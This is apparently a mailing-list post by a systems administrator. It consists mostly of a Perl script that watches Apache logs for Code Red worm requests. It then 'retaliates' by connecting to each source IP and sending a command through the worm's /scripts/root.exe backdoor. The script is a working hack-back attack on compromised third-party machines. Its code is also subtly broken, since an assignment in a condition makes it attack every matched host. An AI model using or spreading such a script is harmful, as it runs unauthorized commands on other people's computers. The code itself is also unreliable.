So creating a fifo for apache to write its access log to and a script like this would be a faux pas then?...
-Max #!/usr/bin/perl # # Script to retaliate against Code Red Attacks. # the author is not responsible for how you use this educational script. use Socket; $fifo = "/var/log/apache/apache.fifo"; $httplogfile = "/var/log/apache/access.log"; $wormlogfile = "/var/log/apache/codered.log"; # The command you want to run on the compromised machine. $win_command = ""; # # Shouldn't need to do anything below here # open (FILE, "<".$fifo) or die "cant open fifo"; while (1){ while (<FILE>){ &httplog; if ($_ =~ m/default.ida/){ $ip = ((split " ", $_)[0]); &logit; if ($version = "2/3"){ &attack }; } } } # Will never get here close FILE; exit 0; sub httplog { # create normal http log open (HTTPLOG, ">>".$httplogfile) or die "cant open http logfile"; print HTTPLOG $_; close HTTPLOG; } sub logit { # Log compromised machine open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile"; $date = ((split " ", $_)[3]); print LOGFILE $date," - ",$ip; if ($_ =~ m/XXXXXX/){ $version = "2/3" } if ($_ =~ m/NNNNNN/){ $version = "1" } else { $version = "?" }; print LOGFILE " v",$version,"]\n"; close LOGFILE; } sub attack { # Attack compromised machine local $proto = getprotobyname('tcp'); socket(osock, PF_INET, SOCK_STREAM, $proto); local $sin = sockaddr_in(80, inet_aton($ip)); connect(osock,$sin) or &attack_failed; print osock "GET /scripts/root.exe HTTP/1.0 \n"; print osock $win_command,"\n"; close (osock); } sub attack_failed { # If Attack Fails open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile"; print LOGFILE $ip," - ATTACK FAILED\n"; close LOGFILE; } -- Max Lock, Senior Linux Systems Administrator, TELE2 Mission Control UK. Linux like wigwam. No windows, no gates, Apache inside.